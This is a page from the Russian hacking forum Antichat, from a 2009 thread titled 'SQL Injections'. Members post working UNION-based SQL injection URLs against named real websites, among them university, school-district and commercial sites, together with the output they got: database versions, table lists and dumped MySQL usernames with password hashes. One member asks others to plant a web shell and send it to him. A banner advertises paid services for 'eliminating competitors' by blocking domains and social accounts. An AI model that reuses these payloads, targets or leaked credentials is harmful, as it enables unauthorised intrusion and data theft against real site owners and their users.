Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 945 из 1242

945

Опции темы

Поиск в этой теме

Опции просмотра

#9441

20.05.2009, 16:20

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

PR: 4

http://dottint.dicea.unifi.it/index.php?fuseaction=showareas&id=1&page=-16+union+select+version()--

5.0.51a-24

tables:
work_student,introduction,posts,forum_mods,video,l iens,themes,document,reponses,catagories,posts_tex t,
access,whosonline,forums,liste_domaines,topics,exe rcice_question,sessions,config,priv_msgs,accueil,w ords,
group_properties,mc_scoring,exercices,user_group,s tat_accueil,course_description,questions,agenda,wo rk,
headermetafooter,pages,forum_access,users,student_ group,disallow,ranks,banlist

http://dottint.dicea.unifi.it/index.php?fuseaction=showareas&id=1&page=-16+union+select+group_concat(concat_ws(0x3a,user,p as sword,file_priv))+from+mysql. user+group+b y+file_priv+limit+1,1--

file_priv : Y

root:0fdabf2d0422efe4:Y,claroroot:28ba5d674194eb31 :Y,debian-sys-maint:*3DDF0119DF873573462050B67B02D659CA586C52,di r-dic:47f1e8824f72016b:Y,elka:40cc7d9422737e7e:Y,dic web:35be89a25baf7df9:Y,fabio:05d26b55199cdec1:Y,eg jp:40cc7d9422737e7e:Y,leo:5ccae1205bd560b6:Y

кто сильный знаток в теме с файлом_прив У,просто я где то читал что мона залить шелл через SQL ,залейте плиз и в ПМ киньте )))если не жалко вам будет

#9442

20.05.2009, 17:52

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

PR3, ТИЦ 120

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8,9,10,11,12,13,14,15

5.0.67-log:u12550@10.10.153.190:u12550

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,TABLE_NAME,7,8,9,10,11,12 ,13,14,15+from+information_schema.tables

Заинтересовала только одна таблица: ACS

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,COLUMN_NAME,7,8,9,10,11,1 2,13,14,15+from+information_schema.columns+where+T ABLE_NAME=0x414353

ID_ACS
ID_SITE
ID_MENU
AUTH_ADMIN
PASS_ADMIN
PRIM

казалось бы. то что нужно... попробовал вывести содержимое, ничего...

http://www.replicator.ru/part.php?news_sort=-2+union+select+1,2,3,4,5,count(*),7,8,9,10,11,12,1 3,14,15+from+ACS

нет записей..

#9443

20.05.2009, 18:17

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

PR: 4

http://www.earthsystem-school.unimore.it/tematiche.php?id=1+union+select+1,version(),3,4--

5.0.45

http://www.earthsystem-school.unimore.it/tematiche.php?id=1+union+ select+1,table_name,3,4 +from+informati on_schema.tables--

Ky4a tables)))

#9444

20.05.2009, 18:27

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Код:

http://antesthermo.ru/03topmenu/09news/?cont_id=235+and+1=0+union+select+1,2,3,4,5,6,7,8,concat(name,0x3a,pass),0,1,2,3,4,5+from+users--

Последний раз редактировалось R1dex; 20.05.2009 в 18:32..

#9445

20.05.2009, 18:43

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

PR: 5
http://www2.dse.unibo.it/dsa/profile.php?id=-1+union+select+1,2,3,4,versio n(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,2 3,24 ,25,26--

5.0.41-log

on9Tb Ha6oP tables:

http://www2.dse.unibo.it/dsa/profile.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26+from+information_schema .tables+group+by+table_s chema+limit+0,1--

Код:

acquisti,acquisti_dettagli,biblioteca,checklist,computer,concorsi,decreti,dsa_lista_attesa,dsa_log_richiesta_intervento,dsa_utenti,elenco_software,int_report,int_richieste,log_accessi,messaggi,monitor,ni_cliente,ni_compatibilita_ricambio_stampante,ni_log_consumabili,ni_magazzino_ricambi_stampante,ni_modello_stampante,ni_oggetto,ni_on

#######################################
PR: 4

http://it.pewaukee.k12.wi.us/employment/ath_jo bs/viewjobcategory_ath.php?ID=-1+union +s elect+1,concat_ws(0x3a,version(),databas e() ,user()),3/*

4.0.26a:employ_athl:jappt@localhost

Последний раз редактировалось HAXTA4OK; 20.05.2009 в 19:21..

#9446

20.05.2009, 22:37

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

[Site]: http://banzaj-ra.com
[Info]: 5.0.51-log:1gbua_x_banza5aa@213.186.117.199:1gbua_x_banza 5aa
[Sploit]: http://banzaj-ra.com/index.php?mod=news&id=-1+union+select+1,concat_ws(0x3a,login,password,mai l),3,4+from+user--

P.S.
Кавычки пропускает, но вроде как прав не хватает.

Последний раз редактировалось Tigger; 20.05.2009 в 23:02..

#9447

20.05.2009, 23:57

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

URL: http://www.sbiznis.com/grad.php?id=138+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14
INFO: http://www.sbiznis.com/grad.php?id=-138+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14
4.0.27-max-log:sbiznis@68.178.232.60:sbiznis
DIR SITE: /home/content/b/i/z/biznis/html

Последний раз редактировалось jokester; 21.05.2009 в 01:00.. Причина: design.ucla.edu БОЯН

#9448

21.05.2009, 07:38

ivanko.rus

Новичок

Регистрация: 05.05.2009

Сообщений: 13

Провел на форуме:
39783

Репутация: 19

Отправить сообщение для ivanko.rus с помощью ICQ

Кстати вот ещё: особенно не раскручивал, но думаю сойдёт
http://www.biomedicas.unam.mx/investigacionFrame.asp?ID=MG%27+or+1=(select+top+1 +table_name+from+information_schema.tables)+--+

#9449

21.05.2009, 08:34

Rav1n

Познающий

Регистрация: 05.11.2008

Сообщений: 92

Провел на форуме:
1562063

Репутация: 149

Код:

http://www.deltarescue.org/deltarescue/war/item.php?id=-21+union+select+1,cast(concat_ws(0x3a,version(),database(),user())+as+binary),3,4,5,6,7--

4.1.11-Debian_4sarge8-log:deltarescue:deltarescue@localhost
_____

Код:

http://www.minelab.com/consumer/page.php?section=-128+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--

4.0.24-nt-max-log:vs255889_1:vs255889_1_dbo@wic016v.server-web.com

#9450

21.05.2009, 14:47

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

<<Newton's Apple>>

Код:

http://www.newtonsapple.tv/TeacherGuide.php?id=902'+union+select+1,2,3,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3,4,5--+

Цитата:

4.1.20:*:newtons:*:tpt@tptwebserver.win2k.tpt.org: *:redhat-linux-gnu

Страница 945 из 1242

945

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход